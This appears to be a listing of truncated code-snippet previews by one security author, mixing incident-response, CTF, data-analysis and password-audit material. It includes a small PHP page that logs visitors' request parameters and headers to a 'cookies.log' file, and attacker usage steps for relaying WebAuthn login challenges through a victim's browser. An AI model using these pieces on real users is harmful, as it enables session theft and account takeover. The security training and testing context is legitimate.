joswr1ght

# Role and Objective/Task

You are an expert-level cybersecurity incident response analyst. Your task is to leverage best practice guidance to assist users in developing incident response playbooks that guide users through complex analysis tasks following an observed Event of Interest (EOI).

# Instructions

Assist the user in developing an incident response playbook for the supplied EOI.

Ask questions when the answer is needed to create a high-quality playbook. These questions could include information about IT infrastructure and systems, existing defense mechanisms, existing organizational policies, and organizational information. If the user provides insufficient detail, ask targeted, technical follow-up questions to clarify the EOI, affected platforms, and org environment before proceeding.

joswr1ght

#!/usr/bin/env python3
# /// script
# dependencies = [
#     "matplotlib",
#     "numpy",
# ]
# ///
"""
===============================================
Network Activity Timeline from CSV Data

joswr1ght

<html>
<?php
file_put_contents("cookies.log", json_encode(array(
    "GET"=>$_GET,
    "POST"=>$_POST,
    "headers"=>getallheaders()))."\n",
    FILE_APPEND);
?>
</html>

joswr1ght

/*
 * WebAuthn Assertion Relay Helper
 *
 * Usage:
 * 1. From your attacker session at https://target-rp.tgt/login,
 *    capture the "publicKey" JSON challenge the RP sends.
 * 2. Send that JSON blob (as text) to the victim browser console as publicKeyJSON.
 * 3. Paste this helper, then call: getAssertion(publicKeyJSON).
 * 4. Copy the printed output (JSON with base64url fields) back
 *    to your attacker machine.

joswr1ght

```
### Create a table to store breach credentials with support for statistical sampling
Mac.localdomain :) CREATE TABLE credentials (
    username String,
    password String
) ENGINE = MergeTree()
ORDER BY (username, cityHash64(username))
SAMPLE BY cityHash64(username);

joswr1ght

I'm sorry to say that Callie Sparkes is not a real person.
Also, she has a terrible password.
Headshot by thispersondoesnotexist.com.

For getting to this page though, I will impart some wisdom that may be useful for the CTF.

A common persistence mechanism on Windows is to deploy a service that runs a process automatically.
You can use `Get-Service` from PowerShell to get a list of services.
Alternatively, you can run `sc query` to list services from a Command Prompt.

joswr1ght

/*
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause

Minor cleanup and clarity changes by Joshua Wright <[email protected]> @joswr1ght
*/
using System;
using System.Net;
using System.Diagnostics;
using System.Reflection;

joswr1ght

# NLTK makes the assumption that users are online when importing the library.
# This is partly to automate the download or corpus files and other aassets,
# but if those files already exist then offline mode is problematic. `import nltk`
# will still work, but it takes a while to timeout, producing errors:
#
# [nltk_data] Error loading averaged_perceptron_tagger: <urlopen error
# [nltk_data]     [Errno -3] Temporary failure in name resolution>
# [nltk_data] Error loading punkt: <urlopen error [Errno -3] Temporary
# [nltk_data]     failure in name resolution>
# [nltk_data] Error loading stopwords: <urlopen error [Errno -3]

joswr1ght

#!/usr/bin/env python3
import json
import sys

if (len(sys.argv) != 3):
    sys.stderr.write('Search RIO Package for string, identify matching group'
                     ' and short title\n')
    sys.stderr.write(f'Usage: {sys.argv[0]} package_export.json "keyword"\n')
    sys.exit(0)

joswr1ght

#!/usr/bin/env python3
# Most of this code is from @clr2of8's Domain Password Audit Tool:
# https://github.com/clr2of8/DPAT
import hashlib
import os
import sys
import textwrap


def wrap(body):